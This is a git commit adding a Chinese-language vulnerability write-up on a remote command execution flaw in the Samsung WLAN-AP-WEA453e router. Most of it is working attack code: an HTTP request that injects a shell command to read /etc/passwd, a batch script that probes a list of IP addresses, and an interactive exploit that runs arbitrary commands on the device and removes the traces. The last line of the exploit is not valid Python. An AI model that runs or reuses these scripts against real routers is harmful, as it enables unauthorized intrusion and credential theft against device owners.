Create WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞.md

2025-06-20 18:00:35 +00:00 · 2022-08-21 14:28:55 +08:00 · 2022-08-21 14:28:55 +08:00 · dcc6e7cf9d
commit dcc6e7cf9d
parent 2562d4762f
1 changed files with 153 additions and 0 deletions
--- a/RCE三星路由器远程命令执行漏洞.md
+++ b/RCE三星路由器远程命令执行漏洞.md
@ -0,0 +1,153 @@
 ### 漏洞简介  
 |漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
 --------|--------|---------|--------|-------|----|------|
 |WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞|2020-8|未知|https://www.Samsung.com| |三星WLAN-AP-WEA453e路由器|
 路由器首页
 ![image](https://user-images.githubusercontent.com/86941613/185778437-2e5218e7-68a0-4d60-8f53-2e91c0d576f4.png)
 ### 漏洞原理
 利用burp构造特殊的请求
 ```shell
    POST /(download)/tmp/a.txt HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
 ```
 ![image](https://user-images.githubusercontent.com/86941613/185778450-ef88e085-aa79-407d-a0ae-bedb50fb53dd.png)
 ### POC批量检测代码如下
 ```python
 #filename: Check.py
 #Usage: python3 Check.py ip.txt
 import requests
 import sys
 import datetime
 def CheckVuln(host):
    vurl = host+'/(download)/tmp/a.txt'
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','Connection': 'close'}
    data = {'command1':'shell:ls|dd of=/tmp/a.txt'}
    try:
        req = requests.post(url=vurl,data=data,verify=False,headers=headers,timeout=1)
        if req.status_code ==200 and 'root' in req.text:
            T = ('[*]-'+host+'-----Vulnerable!')
            print(T)
            OutPut(T)
        else:
            T = ('[-]-'+host+'-----Not Vulnnerable')
            print(T)
            OutPut(T)
    except:
        T = host+'[-]-----Network Error'
        print(T)
        OutPut(T)
 def OutPut(F):
    time =  datetime.datetime.now().strftime('%Y-%m-%d')
    #print(time)
    f = open(time+'.txt','a')
    f.write(F + '\n') 
    f.close()
 def GetUrl(path):
    with open(path,'r',encoding='utf-8') as f:
        for i in f:
            if i.strip() != '':
                oldh = i.strip() 
                #print(oldh)
                host = 'http://'+oldh
                CheckVuln(host)
            else:
                print(path+'Empty File')
 if len(sys.argv) != 2:
    print('-------------Usage:python3 Check.py ip.txt----------------- ')
    sys.exit()
 path = sys.argv[1]
 GetUrl(path)
 ```
 ### EXP
 ```python
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 import requests
 import sys
 import os
 from urllib3.exceptions import InsecureRequestWarning
 class exp:
    def Checking(self):
        try:
            Url = self.target + "(download)/tmp/hello.txt"
            CkData = "command1=shell:cat /etc/passwd| dd of=/tmp/hello.txt"
            response = requests.post(url = Url,data = CkData,verify = False,timeout = 20)
            if(response.status_code == 200 and 'root:' in response.text):
                return True
            else:
                return False
        except Exception as e:
            #print("checking")
            print("[-] Server Error!")
    def Exploit(self):
        Url = self.target + "(download)/tmp/hello.txt"
        while True:
            try:
                command = input("# ")
                if(command == 'exit'):
                    self.Clean()
                    sys.exit()
                if(command == 'cls'):
                    os.system("cls")
                    continue
                data = "command1=shell:" + command + "| dd of=/tmp/hello.txt"
                response = requests.post(url = Url,data = data,verify = False,timeout = 20)
                if(response.text == None):
                    print("[!] Server reply nothing")
                else:
                    print(response.text)
            except KeyboardInterrupt:
                self.Clean()
                exit()
            except Exception as e:
                print("[-] Server not suport this command")
    def Clean(self):
        Url = self.target + "(download)/tmp/hello.txt"
        try:
            CleanData = "command1=shell:busybox rm -f /tmp/hello.txt"
            response = requests.post(url = Url,data = CleanData,verify = False,timeout = 10)
            if(response.status_code == 200):
                print("[+] Clean target successfully!")
                sys.exit()
            else:
                print("[-] Clean Failed!")
        except Exception as e:
            print("[-] Server error!")
    def __init__(self,target,port):
        self.target=target
        requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
        if(len(sys.argv) == 3):
            module = sys.argv[2]
            if(module == 'clean'):
                self.Clean()
            else:
                print("[-] module error!")
        while self.Checking() is True:
            self.Exploit()
 exp(192.168.10.1,80)
 ```